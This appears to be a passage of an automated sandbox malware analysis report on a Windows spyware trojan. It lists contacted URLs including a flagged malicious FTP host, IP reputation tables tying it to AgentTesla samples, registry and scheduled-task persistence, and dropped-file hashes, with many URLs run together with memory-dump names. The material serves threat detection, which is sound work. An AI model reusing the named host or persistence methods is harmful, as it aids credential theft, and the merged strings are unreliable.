                                http://www.fontbureau.com/designers/?s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bThes2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://account.dyn.com/s2Jg1MAahY.exe, 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1854063501.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1854063501.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2968037571.0000000000437000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 0000000F.00000002.1918087486.0000000005023000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers?s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.libertyreserve.com/beta/xml/history.aspxGedTanqRR.exe.0.drfalse
                                          high
                                          http://www.tiro.coms2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designerss2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.goodfont.co.krs2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://api.ipify.org/ts2Jg1MAahY.exe, 00000008.00000002.2977044627.0000000003251000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2976437638.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.2978687835.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2977002334.0000000002B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.chiark.greenend.org.uk/~sgtatham/putty/0s2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drfalse
                                                    high
                                                    https://api.libertyreserve.com/beta/xml/s2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drfalse
                                                      high
                                                      http://www.carterandcone.comls2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sajatypeworks.coms2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.typography.netDs2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.fontbureau.com/designers/cabarga.htmlNs2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn/cThes2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.libertyreserve.com/beta/xml/balance.aspx%AccountNameRequestqhttps://api.libertyreserve.cs2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/staff/dennis.htms2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.ipify.orgs2Jg1MAahY.exe, 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.0000000003251000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2968040431.0000000000436000.00000040.00000400.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1854063501.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1854063501.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2976437638.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000F.00000002.1918087486.0000000005023000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.2978687835.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2977002334.0000000002B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cns2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://api.libertyreserve.com/beta/xml/transfer.aspxGedTanqRR.exe.0.drfalse
                                                                        high
                                                                        http://www.fontbureau.com/designers/frere-user.htmls2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://api.libertyreserve.com/beta/xml/balance.aspx$AccountNameRequestphttps://api.libertyreserve.cs2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://ftp.haliza.com.mys2Jg1MAahY.exe, 00000008.00000002.2977044627.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000332B000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000338C000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.0000000003456000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2976437638.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.2978687835.000000000335C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2977002334.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://www.jiyu-kobo.co.jp/s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.galapagosdesign.com/DPleases2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.fontbureau.com/designers8s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.fonts.coms2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.sandoll.co.krs2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.urwpp.deDPleases2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.zhongyicts.com.cns2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://sci.libertyreserve.com/GedTanqRR.exe.0.drfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/names2Jg1MAahY.exe, 00000000.00000002.1773290594.0000000003115000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.0000000003251000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1852262660.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2976437638.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000F.00000002.1915348802.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.2978687835.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1995497677.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2977002334.0000000002B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.sakkal.coms2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000000.00000002.1780145389.0000000005A64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              104.26.12.205
                                                                                              api.ipify.orgUnited States
                                                                                              13335CLOUDFLARENETUSfalse
                                                                                              110.4.45.197
                                                                                              ftp.haliza.com.myMalaysia
                                                                                              46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue
                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1587906
                                                                                              Start date and time:2025-01-10 19:15:22 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 9m 14s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:27
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:s2Jg1MAahY.exe
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:130c869f7ce90b4dd45a1192c8cb13aa8e3f986ab29fb9f446475e2030a2d2ec.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@33/20@2/2
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 96%
                                                                                              • Number of executed functions: 359
                                                                                              • Number of non-executed functions: 39
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.175.87.197, 13.107.246.45
                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                              TimeTypeDescription
                                                                                              13:16:20API Interceptor1389766x Sleep call for process: s2Jg1MAahY.exe modified
                                                                                              13:16:22API Interceptor80x Sleep call for process: powershell.exe modified
                                                                                              13:16:25API Interceptor198812x Sleep call for process: GedTanqRR.exe modified
                                                                                              13:16:34API Interceptor1295567x Sleep call for process: sgxIb.exe modified
                                                                                              18:16:22Task SchedulerRun new task: GedTanqRR path: C:\Users\user\AppData\Roaming\GedTanqRR.exe
                                                                                              18:16:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                              18:16:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              104.26.12.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                              • api.ipify.org/
                                                                                              jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/?format=text
                                                                                              xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                                                              • api.ipify.org/
                                                                                              GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                              • api.ipify.org/
                                                                                              8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                                              • api.ipify.org/
                                                                                              Simple2.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                              • api.ipify.org/
                                                                                              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                              • api.ipify.org/
                                                                                              110.4.45.197Pi648je050.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                Termination_List_November_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  Payment_Advice_USD_48,054.40_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    Payslip_October_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  api.ipify.orgY8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  DpTbBYeE7J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  7DpzcPcsTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  B8FnDUj8hy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  FSRHC6mB16.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  9pIm5d0rsW.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  VYLigyTDuW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  ftp.haliza.com.myPi648je050.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  Termination_List_November_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  Payment_Advice_USD_48,054.40_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  Payslip_October_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  CLOUDFLARENETUShttps://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 1.1.1.1
                                                                                                                  https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 172.64.147.188
                                                                                                                  jd4t3R7hOq.exeGet hashmaliciousAzorultBrowse
                                                                                                                  • 104.21.75.48
                                                                                                                  RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 172.67.196.114
                                                                                                                  Voicemail_+Transcription+_ATT006151.docxGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 104.21.28.65
                                                                                                                  xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.112.1
                                                                                                                  EXABYTES-AS-APExaBytesNetworkSdnBhdMY5.elfGet hashmaliciousUnknownBrowse
                                                                                                                  • 203.142.6.36
                                                                                                                  armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                  • 203.142.6.55
                                                                                                                  http://zilianmy.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 103.6.198.100
                                                                                                                  https://url.uk.m.mimecastprotect.com/s/i6hKCJ8OAsjPWvuxFXHy1dB_?domain=finatal.us2.list-manage.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 137.59.109.34
                                                                                                                  https://finatal.us2.list-manage.com/track/click?u=f73f7708eca5e1d2f61bc2a09&id=82613a7740&e=d824888c03Get hashmaliciousUnknownBrowse
                                                                                                                  • 137.59.109.34
                                                                                                                  Pi648je050.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  Termination_List_November_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  https://www.canva.com/design/DAGVnZ3mr_Y/4CQQbX1-EKRcha16TVbYxQ/view?utm_content=DAGVnZ3mr_Y&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousMamba2FABrowse
                                                                                                                  • 103.6.199.200
                                                                                                                  Payment_Advice_USD_48,054.40_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  Payslip_October_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 110.4.45.197
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0efGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  No context
                                                                                                                  Process:C:\Users\user\AppData\Roaming\GedTanqRR.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):1216
                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                  Process:C:\Users\user\Desktop\s2Jg1MAahY.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1216
                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                  Malicious:true
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                  Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1216
                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2232
                                                                                                                  Entropy (8bit):5.379677338874509
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:tLHxvIIwLgZ2KRHWLOuggs
                                                                                                                  MD5:F825B63C7D6B045FCFBA8BE6E0757BB8
                                                                                                                  SHA1:789ED088BEEB1F6A08141F2D3F2DC8315AD23B35
                                                                                                                  SHA-256:E1CA090C9A65A42E64DD89FB4FBD281F8128747D20DEE28178B630029F2D5818
                                                                                                                  SHA-512:A13109C035829E502531A8741A28154F4FABF8719B92BF1646255B6B53CB3F3FA8BD8CAC4DC363E0A1D5308440E57170DB6ED2CA50549EEAC487CAB70DD5E6AF
                                                                                                                  Malicious:false
